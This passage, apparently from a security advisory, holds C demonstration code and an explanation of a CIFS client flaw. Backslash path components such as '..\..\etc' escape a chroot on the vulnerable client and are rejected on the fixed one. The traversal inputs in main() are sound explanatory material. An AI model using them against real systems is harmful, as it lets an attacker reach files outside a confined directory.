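    build_smb_path(wire, sizeof wire, chroot_prefix, comp);
    server_canonicalise(wire, out, outsz);
    return 0;
}

/* 1 when the server-side path is still inside the chroot directory. */
int inside_chroot(const char *chroot_prefix, const char *server_path)
{
    char root[MAXPATH];
    snprintf(root, sizeof root, "\\%s", chroot_prefix);
    size_t rl = strlen(root);
    if (rl == 1)                 /* chroot at the share root: nothing is outside */
        return 1;
    return strncmp(server_path, root, rl) == 0 &&
           (server_path[rl] == '\0' || server_path[rl] == '\\');
}

/* Convenience wrapper: canonical server path, or NULL if rejected.
 * The buffer is static and overwritten on each call. */
const char *resolved(int fixed, const char *chroot_prefix, const char *comp)
{
    static char out[MAXPATH];
    if (lookup_in_chroot(fixed, chroot_prefix, comp, out, sizeof out) != 0)
        return NULL;
    return out;
}

int main(void)
{
    /* Constructed scenario: the chroot is the directory \jail on the share. */
    const char *jail = "jail";
    const char *tries[] = { "etc", "..", "..\\", "..\\..\\etc" };

    for (int fixed = 0; fixed <= 1; fixed++)
        for (size_t i = 0; i < sizeof tries / sizeof *tries; i++) {
            const char *p = resolved(fixed, jail, tries[i]);
            printf("%s client: lookup \"%s\" -> %s%s\n",
                   fixed ? "fixed     " : "vulnerable", tries[i],
                   p ? p : "rejected (EINVAL)",
                   p && !inside_chroot(jail, p) ? "   <-- escaped chroot" : "");
        }
    return 0;
}
```

Run as written, the vulnerable client maps "..\" to the share root and "..\..\etc" to "\etc", both outside "\jail", while the fixed client rejects every component containing a backslash and the plain ".." is clamped at the chroot by the VFS before CIFS ever sees it.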

- Solution

Please see the referenced advisories for information on obtaining updates to this issue.
